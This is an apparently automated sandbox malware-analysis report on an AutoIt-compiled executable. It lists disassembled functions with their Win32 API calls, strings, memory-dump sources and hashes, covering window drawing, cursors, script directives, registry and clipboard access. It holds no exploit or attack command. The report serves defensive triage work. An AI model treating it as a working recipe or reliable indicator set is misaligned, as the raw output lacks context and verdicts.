                                                                                                                    • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                    • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                    Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                    Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 1038674560-3360698832
                                                                                                                    • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                    • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                    Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1675784387-0
                                                                                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                    Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1582027408-0
                                                                                                                    • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                    • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                    Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseConnectCreateRegistry
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 3217815495-966354055
                                                                                                                    • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                    • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                    Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                    • String ID: ($,$tooltips_class32
                                                                                                                    • API String ID: 225202481-3320066284
                                                                                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                    Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15083398-0
                                                                                                                    • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                                    • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                                    Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                    • String ID: @$AutoIt v3 GUI
                                                                                                                    • API String ID: 867697134-3359773793
                                                                                                                    • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                    • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                    Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 1503153545-1459072770
                                                                                                                    • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                    • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                    Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
